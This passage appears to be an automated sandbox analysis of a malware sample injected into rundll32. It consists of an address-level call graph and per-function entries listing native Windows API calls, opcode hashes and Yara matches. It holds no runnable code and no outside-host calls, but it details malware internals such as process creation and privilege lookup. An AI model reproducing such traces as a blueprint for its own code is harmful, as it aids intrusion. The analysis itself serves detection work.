89937 54a2d0 LdrLoadDll 89935->89937 89938 54a480 2 API calls 89936->89938 89946 5445e4 89937->89946 89940 54446f 89938->89940 89941 54a2d0 LdrLoadDll 89939->89941 89940->89884 89942 5444b5 89941->89942 89944 5444d1 89942->89944 89945 5444bc 89942->89945 89949 5444d6 89944->89949 89956 5444ec 89944->89956 89948 54a480 2 API calls 89945->89948 90001 54a310 LdrLoadDll 89946->90001 89947 54461e 89950 54a480 2 API calls 89947->89950 89951 5444c5 89948->89951 89952 54a480 2 API calls 89949->89952 89953 544629 89950->89953 89951->89884 89954 5444df 89952->89954 89953->89884 89954->89884 89955 5444f1 89966 544503 89955->89966 89992 54a400 89955->89992 89956->89955 89989 54bf80 89956->89989 89959 544557 89960 54456e 89959->89960 90000 54a290 LdrLoadDll 89959->90000 89962 544575 89960->89962 89963 54458a 89960->89963 89964 54a480 2 API calls 89962->89964 89965 54a480 2 API calls 89963->89965 89964->89966 89967 544593 89965->89967 89966->89884 89968 5445bf 89967->89968 89995 54bb80 89967->89995 89968->89884 89970 5445aa 89971 54bdb0 2 API calls 89970->89971 89972 5445b3 89971->89972 89972->89884 89973->89857 89974->89879 89976 54af50 LdrLoadDll 89975->89976 89977 544d04 89976->89977 89978 54a310 LdrLoadDll 89977->89978 89978->89882 89980 54a49c NtClose 89979->89980 89981 54af50 LdrLoadDll 89979->89981 89980->89886 89981->89980 89982->89866 89986 54a620 89983->89986 89985 54bfda 89985->89930 89987 54a63c RtlAllocateHeap 89986->89987 89988 54af50 LdrLoadDll 89986->89988 89987->89985 89988->89987 89990 54a620 2 API calls 89989->89990 89991 54bf98 89989->89991 89990->89991 89991->89955 89993 54a41c NtReadFile 89992->89993 89994 54af50 LdrLoadDll 89992->89994 89993->89959 89994->89993 89996 54bba4 89995->89996 89997 54bb8d 89995->89997 89996->89970 89997->89996 89998 54bf80 2 API calls 89997->89998 89999 54bbbb 89998->89999 89999->89970 90000->89960 90001->89947 90003 544071 90002->90003 90005 544079 90002->90005 90003->89894 90004 54434c 90004->89894 90005->90004 90129 54cf20 90005->90129 90007 5440cd 90008 54cf20 2 API calls 90007->90008 90012 5440d8 90008->90012 90009 544126 90011 54cf20 2 API calls 90009->90011 90015 54413a 90011->90015 90012->90009 90013 54d050 3 API calls 90012->90013 90143 54cfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 90012->90143 90013->90012 90014 544197 90016 54cf20 2 API calls 90014->90016 90015->90014 90134 54d050 90015->90134 90018 5441ad 90016->90018 90019 5441ea 90018->90019 90021 54d050 3 API calls 90018->90021 90020 54cf20 2 API calls 90019->90020 90022 5441f5 90020->90022 90021->90018 90023 54d050 3 API calls 90022->90023 90030 54422f 90022->90030 90023->90022 90026 54cf80 2 API calls 90027 54432e 90026->90027 90028 54cf80 2 API calls 90027->90028 90029 544338 90028->90029 90031 54cf80 2 API calls 90029->90031 90140 54cf80 90030->90140 90032 544342 90031->90032 90033 54cf80 2 API calls 90032->90033 90033->90004 90035 545391 90034->90035 90036 544a40 8 API calls 90035->90036 90038 5453a7 90036->90038 90037 5453fa 90037->89898 90038->90037 90039 5453f5 90038->90039 90040 5453e2 90038->90040 90041 54bdb0 2 API calls 90039->90041 90042 54bdb0 2 API calls 90040->90042 90041->90037 90043 5453e7 90042->90043 90043->89898 90045 54ad74 90044->90045 90046 54ac20 LdrLoadDll 90044->90046 90144 54ac20 90045->90144 90046->90045 90048 54ad7d 90049 54ac20 LdrLoadDll 90048->90049 90050 54ad86 90049->90050 90051 54ac20 LdrLoadDll 90050->90051 90052 54ad8f 90051->90052 90053 54ac20 LdrLoadDll 90052->90053 90054 54ad98 90053->90054 90055 54ac20 LdrLoadDll 90054->90055 90056 54ada1 90055->90056 90057 54ac20 LdrLoadDll 90056->90057 90058 54adad 90057->90058 90059 54ac20 LdrLoadDll 90058->90059 90060 54adb6 90059->90060 90061 54ac20 LdrLoadDll 90060->90061 90062 54adbf 90061->90062 90063 54ac20 LdrLoadDll 90062->90063 90064 54adc8 90063->90064 90065 54ac20 LdrLoadDll 90064->90065 90066 54add1 90065->90066 90067 54ac20 LdrLoadDll 90066->90067 90068 54adda 90067->90068 90069 54ac20 LdrLoadDll 90068->90069 90070 54ade6 90069->90070 90071 54ac20 LdrLoadDll 90070->90071 90072 54adef 90071->90072 90073 54ac20 LdrLoadDll 90072->90073 90074 54adf8 90073->90074 90075 54ac20 LdrLoadDll 90074->90075 90076 54ae01 90075->90076 90077 54ac20 LdrLoadDll 90076->90077 90078 54ae0a 90077->90078 90079 54ac20 LdrLoadDll 90078->90079 90080 54ae13 90079->90080 90081 54ac20 LdrLoadDll 90080->90081 90082 54ae1f 90081->90082 90083 54ac20 LdrLoadDll 90082->90083 90084 54ae28 90083->90084 90085 54ac20 LdrLoadDll 90084->90085 90086 54ae31 90085->90086 90087 54ac20 LdrLoadDll 90086->90087 90088 54ae3a 90087->90088 90089 54ac20 LdrLoadDll 90088->90089 90090 54ae43 90089->90090 90091 54ac20 LdrLoadDll 90090->90091 90092 54ae4c 90091->90092 90093 54ac20 LdrLoadDll 90092->90093 90094 54ae58 90093->90094 90095 54ac20 LdrLoadDll 90094->90095 90096 54ae61 90095->90096 90097 54ac20 LdrLoadDll 90096->90097 90098 54ae6a 90097->90098 90099 54ac20 LdrLoadDll 90098->90099 90100 54ae73 90099->90100 90101 54ac20 LdrLoadDll 90100->90101 90102 54ae7c 90101->90102 90103 54ac20 LdrLoadDll 90102->90103 90104 54ae85 90103->90104 90105 54ac20 LdrLoadDll 90104->90105 90106 54ae91 90105->90106 90107 54ac20 LdrLoadDll 90106->90107 90108 54ae9a 90107->90108 90109 54ac20 LdrLoadDll 90108->90109 90110 54aea3 90109->90110 90111 54ac20 LdrLoadDll 90110->90111 90112 54aeac 90111->90112 90113 54ac20 LdrLoadDll 90112->90113 90114 54aeb5 90113->90114 90115 54ac20 LdrLoadDll 90114->90115 90116 54aebe 90115->90116 90117 54ac20 LdrLoadDll 90116->90117 90118 54aeca 90117->90118 90119 54ac20 LdrLoadDll 90118->90119 90120 54aed3 90119->90120 90121 54ac20 LdrLoadDll 90120->90121 90122 54aedc 90121->90122 90122->89902 90124 54af50 LdrLoadDll 90123->90124 90125 549ecc 90124->90125 90150 46a2d10 LdrInitializeThunk 90125->90150 90126 549ee3 90126->89832 90128->89899 90130 54cf36 90129->90130 90131 54cf30 90129->90131 90132 54bf80 2 API calls 90130->90132 90131->90007 90133 54cf5c 90132->90133 90133->90007 90135 54cfc0 90134->90135 90136 54d01d 90135->90136 90137 54bf80 2 API calls 90135->90137 90136->90015 90138 54cffa 90137->90138 90139 54bdb0 2 API calls 90138->90139 90139->90136 90141 544324 90140->90141 90142 54bdb0 2 API calls 90140->90142 90141->90026 90142->90141 90143->90012 90145 54ac3b 90144->90145 90146 544e40 LdrLoadDll 90145->90146 90147 54ac5b 90146->90147 90148 544e40 LdrLoadDll 90147->90148 90149 54ad07 90147->90149 90148->90149 90149->90048 90149->90149 90150->90126 90152 46a2b3f LdrInitializeThunk 90151->90152 90153 46a2b31 90151->90153 90152->89908 90153->89908 90155 54af50 LdrLoadDll 90154->90155 90156 54a67c RtlFreeHeap 90155->90156 90156->89912 90158 537eb0 90157->90158 90159 537eab 90157->90159 90160 54bd30 2 API calls 90158->90160 90159->89840 90163 537ed5 90160->90163 90161 537f38 90161->89840 90162 549eb0 2 API calls 90162->90163 90163->90161 90163->90162 90164 537f3e 90163->90164 90168 54bd30 2 API calls 90163->90168 90173 54a5b0 90163->90173 90166 537f64 90164->90166 90167 54a5b0 2 API calls 90164->90167 90166->89840 90169 537f55 90167->90169 90168->90163 90169->89840 90171 53817e 90170->90171 90172 54a5b0 2 API calls 90170->90172 90171->89801 90172->90171 90174 54af50 LdrLoadDll 90173->90174 90175 54a5cc 90174->90175 90178 46a2b90 LdrInitializeThunk 90175->90178 90176 54a5e3 90176->90163 90178->90176 90180 54b5b3 90179->90180 90181 53ace0 LdrLoadDll 90180->90181 90182 539c3a 90181->90182 90182->89807 90184 53b053 90183->90184 90186 53b0d0 90184->90186 90199 549c80 LdrLoadDll 90184->90199 90186->89814 90188 54a1d9 90187->90188 90189 54af50 LdrLoadDll 90188->90189 90190 53f1ab 90189->90190 90190->89817 90191 54a7c0 90190->90191 90192 54af50 LdrLoadDll 90191->90192 90193 54a7df LookupPrivilegeValueW 90192->90193 90193->89819 90195 54af50 LdrLoadDll 90194->90195 90196 54a26c 90195->90196 90200 46a2dc0 LdrInitializeThunk 90196->90200 90197 54a28b 90197->89820 90199->90186 90200->90197 90202 53b1e0 90201->90202 90203 53b030 LdrLoadDll 90202->90203 90204 53b1f4 90203->90204 90204->89754 90206 53af24 90205->90206 90278 549c80 LdrLoadDll 90206->90278 90208 53af5e 90208->89756 90210 53f39c 90209->90210 90211 53b1b0 LdrLoadDll 90210->90211 90212 53f3ae 90211->90212 90279 53f280 90212->90279 90215 53f3e1 90218 53f3f2 90215->90218 90220 54a480 2 API calls 90215->90220 90216 53f3c9 90217 53f3d4 90216->90217 90219 54a480 2 API calls 90216->90219 90217->89760 90218->89760 90219->90217 90220->90218 90222 53f42c 90221->90222 90298 53b2a0 90222->90298 90224 53f43e 90225 53f280 3 API calls 90224->90225 90226 53f44f 90225->90226 90227 53f471 90226->90227 90228 53f459 90226->90228 90229 53f482 90227->90229 90232 54a480 2 API calls 90227->90232 90230 53f464 90228->90230 90231 54a480 2 API calls 90228->90231 90229->89762 90230->89762 90231->90230 90232->90229 90234 53ca96 90233->90234 90235 53caa0 90233->90235 90234->89771 90236 53af00 LdrLoadDll 90235->90236 90237 53cb3e 90236->90237 90238 53cb64 90237->90238 90239 53b030 LdrLoadDll 90237->90239 90238->89771 90240 53cb80 90239->90240 90241 544a40 8 API calls 90240->90241 90242 53cbd5 90241->90242 90242->89771 90244 53d636 90243->90244 90245 53b030 LdrLoadDll 90244->90245 90246 53d64a 90245->90246 90302 53d300 90246->90302 90248 53908b 90249 53cbf0 90248->90249 90250 53cc16 90249->90250 90251 53b030 LdrLoadDll 90250->90251 90252 53cc99 90250->90252 90251->90252 90253 53b030 LdrLoadDll 90252->90253 90254 53cd06 90253->90254 90255 53af00 LdrLoadDll 90254->90255 90256 53cd6f 90255->90256 90257 53b030 LdrLoadDll 90256->90257 90258 53ce1f 90257->90258 90258->89784 90262 538d14 90259->90262 90332 53f6c0 90259->90332 90261 538f25 90261->89739 90262->90261 90337 544390 90262->90337 90264 538d70 90264->90261 90340 538ab0 90264->90340 90267 54cf20 2 API calls 90268 538db2 90267->90268 90269 54d050 3 API calls 90268->90269 90273 538dc7 90269->90273 90270 537ea0 4 API calls 90270->90273 90273->90261 90273->90270 90274 53c7a0 18 API calls 90273->90274 90275 538160 2 API calls 90273->90275 90345 53f660 90273->90345 90349 53f070 21 API calls 90273->90349 90274->90273 90275->90273 90276->89763 90277->89781 90278->90208 90280 53f29a 90279->90280 90288 53f350 90279->90288 90281 53b030 LdrLoadDll 90280->90281 90282 53f2bc 90281->90282 90289 549f30 90282->90289 90284 53f2fe 90292 549f70 90284->90292 90287 54a480 2 API calls 90287->90288 90288->90215 90288->90216 90290 549f4c 90289->90290 90291 54af50 LdrLoadDll 90289->90291 90290->90284 90291->90290 90293 54af50 LdrLoadDll 90292->90293 90294 549f8c 90293->90294 90297 46a34e0 LdrInitializeThunk 90294->90297 90295 53f344 90295->90287 90297->90295 90299 53b2c7 90298->90299 90300 53b030 LdrLoadDll 90299->90300 90301 53b303 90300->90301 90301->90224 90303 53d317 90302->90303 90311 53f700 90303->90311 90307 53d38b 90308 53d392 90307->90308 90323 54a290 LdrLoadDll 90307->90323 90308->90248 90310 53d3a5 90310->90248 90312 53f725 90311->90312 90324 5381a0 90312->90324 90314 53d35f 90319 54a6d0 90314->90319 90315 544a40 8 API calls 90317 53f749 90315->90317 90317->90314 90317->90315 90318 54bdb0 2 API calls 90317->90318 90331 53f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 90317->90331 90318->90317 90320 54af50 LdrLoadDll 90319->90320 90321 54a6ef CreateProcessInternalW 90320->90321 90321->90307 90323->90310 90325 53829f 90324->90325 90326 5381b5 90324->90326 90325->90317 90326->90325 90327 544a40 8 API calls 90326->90327 90328 538222 90327->90328 90329 54bdb0 2 API calls 90328->90329 90330 538249 90328->90330 90329->90330 90330->90317 90331->90317 90333 544e40 LdrLoadDll 90332->90333 90334 53f6df 90333->90334 90335 53f6e6 SetErrorMode 90334->90335 90336 53f6ed 90334->90336 90335->90336 90336->90262 90350 53f490 90337->90350 90339 5443b6 90339->90264 90341 54bd30 2 API calls 90340->90341 90344 538ad5 90341->90344 90342 538cea 90342->90267 90344->90342 90369 549870 90344->90369 90346 53f673 90345->90346 90417 549e80 90346->90417 90349->90273 90351 53f4ad 90350->90351 90357 549fb0 90351->90357 90354 53f4f5 90354->90339 90358 54af50 LdrLoadDll 90357->90358 90359 549fcc 90358->90359 90360 53f4ee 90359->90360 90367 46a2e50 LdrInitializeThunk 90359->90367 90360->90354 90362 54a000 90360->90362 90363 54af50 LdrLoadDll 90362->90363 90364 54a01c 90363->90364 90368 46a2c30 LdrInitializeThunk 90364->90368 90365 53f51e 90365->90339 90367->90360 90368->90365 90370 54bf80 2 API calls 90369->90370 90371 549887 90370->90371 90390 539310 90371->90390 90373 5498a2 90374 5498e0 90373->90374 90375 5498c9 90373->90375 90377 54bd30 2 API calls 90374->90377 90376 54bdb0 2 API calls 90375->90376 90378 5498d6 90376->90378 90379 54991a 90377->90379 90378->90342 90380 54bd30 2 API calls 90379->90380 90381 549933 90380->90381 90387 549bd4 90381->90387 90396 54bd70 LdrLoadDll 90381->90396 90383 549bb9 90384 549bc0 90383->90384 90383->90387 90385 54bdb0 2 API calls 90384->90385 90386 549bca 90385->90386 90386->90342 90388 54bdb0 2 API calls 90387->90388 90389 549c29 90388->90389 90389->90342 90391 539335 90390->90391 90392 53ace0 LdrLoadDll 90391->90392 90393 539368 90392->90393 90395 53938d 90393->90395 90397 53cf10 90393->90397 90395->90373 90396->90383 90398 53cf3c 90397->90398 90399 54a1d0 LdrLoadDll 90398->90399 90400 53cf55 90399->90400 90401 53cf5c 90400->90401 90408 54a210 90400->90408 90401->90395 90405 53cf97 90406 54a480 2 API calls 90405->90406 90407 53cfba 90406->90407 90407->90395 90409 54af50 LdrLoadDll 90408->90409 90410 54a22c 90409->90410 90416 46a2bc0 LdrInitializeThunk 90410->90416 90411 53cf7f 90411->90401 90413 54a800 90411->90413 90414 54a81f 90413->90414 90415 54af50 LdrLoadDll 90413->90415 90414->90405 90415->90414 90416->90411 90418 54af50 LdrLoadDll 90417->90418 90419 549e9c 90418->90419 90422 46a2cf0 LdrInitializeThunk 90419->90422 90420 53f69e 90420->90273 90422->90420 90425 46a29f0 LdrInitializeThunk 90427 53f00d 90428 53f015 90427->90428 90443 53d980 90428->90443 90430 53f023 90431 53f027 90430->90431 90441 53d980 8 API calls 90430->90441 90460 53d97e 90430->90460 90477 53da83 90430->90477 90438 53f040 90431->90438 90521 533bd0 90431->90521 90433 54bf80 2 API calls 90435 53f04e 90433->90435 90434 53f03a 90545 5491a0 90434->90545 90437 53f06a 90435->90437 90550 53ef90 14 API calls 90435->90550 90438->90433 90441->90431 90444 53d9b4 90443->90444 90445 53b2a0 LdrLoadDll 90444->90445 90446 53d9c6 90445->90446 90551 53b410 90446->90551 90448 53d9e4 90449 53d9fb 90448->90449 90451 544a40 8 API calls 90448->90451 90450 53b410 LdrLoadDll 90449->90450 90452 53da14 90450->90452 90451->90449 90453 53da2b 90452->90453 90454 544a40 8 API calls 90452->90454 90455 53f490 3 API calls 90453->90455 90454->90453 90456 53da52 90455->90456 90457 53da59 90456->90457 90458 54bfc0 2 API calls 90456->90458 90457->90430 90459 53da6a 90458->90459 90459->90430 90461 53d9b4 90460->90461 90462 53b2a0 LdrLoadDll 90461->90462 90463 53d9c6 90462->90463 90464 53b410 LdrLoadDll 90463->90464 90465 53d9e4 90464->90465 90466 53d9fb 90465->90466 90468 544a40 8 API calls 90465->90468 90467 53b410 LdrLoadDll 90466->90467 90469 53da14 90467->90469 90468->90466 90470 53da2b 90469->90470 90471 544a40 8 API calls 90469->90471 90472 53f490 3 API calls 90470->90472 90471->90470 90473 53da52 90472->90473 90474 53da59 90473->90474 90475 54bfc0 2 API calls 90473->90475 90474->90431 90476 53da6a 90475->90476 90476->90431 90478 53da1d 90477->90478 90486 53da87 90477->90486 90479 53da2b 90478->90479 90480 544a40 8 API calls 90478->90480 90481 53f490 3 API calls 90479->90481 90480->90479 90482 53da52 90481->90482 90483 53da59 90482->90483 90484 54bfc0 2 API calls 90482->90484 90483->90431 90485 53da6a 90484->90485 90485->90431 90487 544e40 LdrLoadDll 90486->90487 90497 53de56 90486->90497 90488 53db0e 90487->90488 90489 544e40 LdrLoadDll 90488->90489 90490 53db2e 90489->90490 90491 544e40 LdrLoadDll 90490->90491 90492 53db51 90491->90492 90493 53b2a0 LdrLoadDll 90492->90493 90492->90497 90494 53dc5d 90493->90494 90495 53b410 LdrLoadDll 90494->90495 90496 53dc7f 90495->90496 90496->90497 90498 544e40 LdrLoadDll 90496->90498 90497->90431 90499 53dcab 90498->90499 90500 544e40 LdrLoadDll 90499->90500 90501 53dcc7 90500->90501 90502 544e40 LdrLoadDll 90501->90502 90503 53dce7 90502->90503 90504 544e40 LdrLoadDll 90503->90504 90505 53dd04 90504->90505 90506 544e40 LdrLoadDll 90505->90506 90507 53dd21 90506->90507 90508 544e40 LdrLoadDll 90507->90508 90509 53dd41 90508->90509 90509->90497 90554 5355a0 LdrLoadDll 90509->90554 90511 53dd91 90555 5355a0 LdrLoadDll 90511->90555 90513 53ddb2 90556 5355a0 LdrLoadDll 90513->90556 90515 53ddd3 90557 5355a0 LdrLoadDll 90515->90557 90517 53ddf1 90517->90497 90558 5355a0 LdrLoadDll 90517->90558 90519 53de38 90559 5355a0 LdrLoadDll 90519->90559 90522 533bf6 90521->90522 90523 53cf10 3 API calls 90522->90523 90525 533cc1 90523->90525 90524 533cc8 90524->90434 90525->90524 90560 54c000 90525->90560 90527 533d29 90528 53b030 LdrLoadDll 90527->90528 90529 533e33 90528->90529 90530 53b030 LdrLoadDll 90529->90530 90531 533e57 90530->90531 90564 53cfd0 90531->90564 90535 533ee3 90536 54bd30 2 API calls 90535->90536 90537 533f70 90536->90537 90538 54bd30 2 API calls 90537->90538 90539 533f8a 90538->90539 90540 5340f2 90539->90540 90541 53b030 LdrLoadDll 90539->90541 90540->90434 90542 533fb9 90541->90542 90543 53af00 LdrLoadDll 90542->90543 90544 534059 90543->90544 90544->90434 90546 5491c1 90545->90546 90547 544e40 LdrLoadDll 90545->90547 90548 5491e7 90546->90548 90549 5491d4 CreateThread 90546->90549 90547->90546 90548->90438 90549->90438 90550->90437 90552 53b030 LdrLoadDll 90551->90552 90553 53b429 90552->90553 90553->90448 90554->90511 90555->90513 90556->90515 90557->90517 90558->90519 90559->90497 90561 54c00d 90560->90561 90562 544e40 LdrLoadDll 90561->90562 90563 54c020 90562->90563 90563->90527 90565 53cff5 90564->90565 90573 54a080 90565->90573 90568 54a110 90569 54af50 LdrLoadDll 90568->90569 90570 54a12c 90569->90570 90579 46a2b00 LdrInitializeThunk 90570->90579 90571 54a14b 90571->90535 90574 54af50 LdrLoadDll 90573->90574 90575 54a09c 90574->90575 90578 46a2b80 LdrInitializeThunk 90575->90578 90576 533ebc 90576->90535 90576->90568 90578->90576 90579->90571

                                                                                                                              Executed Functions

                                                                                                                              Function 0054A350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 394 54a350-54a3a1 call 54af50 NtCreateFile
                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00544BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00544BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0054A39D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID: .z`
                                                                                                                              • API String ID: 823142352-1441809116
                                                                                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                              • Instruction ID: 0f4477d0e8aa716bdaeb39ca0ab91db5f5526cd2aa3c227533efabe70cf4a56f
                                                                                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                              • Instruction Fuzzy Hash: 71F0BDB2200208AFCB48CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A3FA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 397 54a3fa-54a449 call 54af50 NtReadFile
                                                                                                                              APIs
                                                                                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!JT,FFFFFFFF,?,bMT,?,00000000), ref: 0054A445
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID: !JT
                                                                                                                              • API String ID: 2738559852-2690566055
                                                                                                                              • Opcode ID: 41410ea734f7490a16153160d8c0235673452366bcddec6ecab870ac3336ba72
                                                                                                                              • Instruction ID: e71a6918f9a6167a671e9d1d381331859fa3f93f5e43f89a8029b50d5b6bae60
                                                                                                                              • Opcode Fuzzy Hash: 41410ea734f7490a16153160d8c0235673452366bcddec6ecab870ac3336ba72
                                                                                                                              • Instruction Fuzzy Hash: BCF0C4B6240108AFDB14CF99CC80EEB77A9AF9D354F158258BA1DD7252D630E8118BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A400 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 400 54a400-54a416 401 54a41c-54a449 NtReadFile 400->401 402 54a417 call 54af50 400->402 402->401
                                                                                                                              APIs
                                                                                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!JT,FFFFFFFF,?,bMT,?,00000000), ref: 0054A445
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID: !JT
                                                                                                                              • API String ID: 2738559852-2690566055
                                                                                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                              • Instruction ID: bbcb00581c4d48c3b099b303159490c943d06e181ddfad6c31c1bb16fdffe5f8
                                                                                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                              • Instruction Fuzzy Hash: ECF0A4B6200208AFDB14DF89DC85EEB77ADAF8C754F158248BE1D97241D630E8118BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A47A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 414 54a47a-54a4a9 call 54af50 NtClose
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(@MT,?,?,00544D40,00000000,FFFFFFFF), ref: 0054A4A5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID: @MT
                                                                                                                              • API String ID: 3535843008-2785734775
                                                                                                                              • Opcode ID: 4e9380018427c795899e84853a118b487d0f4b3fc6694f8b224d0b7a32cbd04c
                                                                                                                              • Instruction ID: 9a9819657189e0af45ef714872eb2d4664dcfbd7bcb1360323434d555e3c0d71
                                                                                                                              • Opcode Fuzzy Hash: 4e9380018427c795899e84853a118b487d0f4b3fc6694f8b224d0b7a32cbd04c
                                                                                                                              • Instruction Fuzzy Hash: 86E08C75240114BFEB20DFA8CC86FDB7B28EF44350F114059B91DAB242C631EA108AA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A480 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 417 54a480-54a496 418 54a49c-54a4a9 NtClose 417->418 419 54a497 call 54af50 417->419 419->418
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(@MT,?,?,00544D40,00000000,FFFFFFFF), ref: 0054A4A5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID: @MT
                                                                                                                              • API String ID: 3535843008-2785734775
                                                                                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                              • Instruction ID: 9aaa27d8a1b33091f09d8cc77d284dfdd0b03ea10ef362f3bc64dd0eb03af3eb
                                                                                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                              • Instruction Fuzzy Hash: 54D01776240214BBE710EF98CC89EE77BACEF88764F154499BA1C9B242C530FA0086E0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00532D11,00002000,00003000,00000004), ref: 0054A569
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2167126740-0
                                                                                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                              • Instruction ID: 94aa8215f56f32aa20c905caf437b7e5c89bd5fc5fca13e56cac9fac771fe4c5
                                                                                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                              • Instruction Fuzzy Hash: E4F015B6200208AFDB14DF89CC81EEB77ADAF88754F118148BE1C97241C630F810CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0054A52A Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00532D11,00002000,00003000,00000004), ref: 0054A569
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_530000_rundll32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2167126740-0
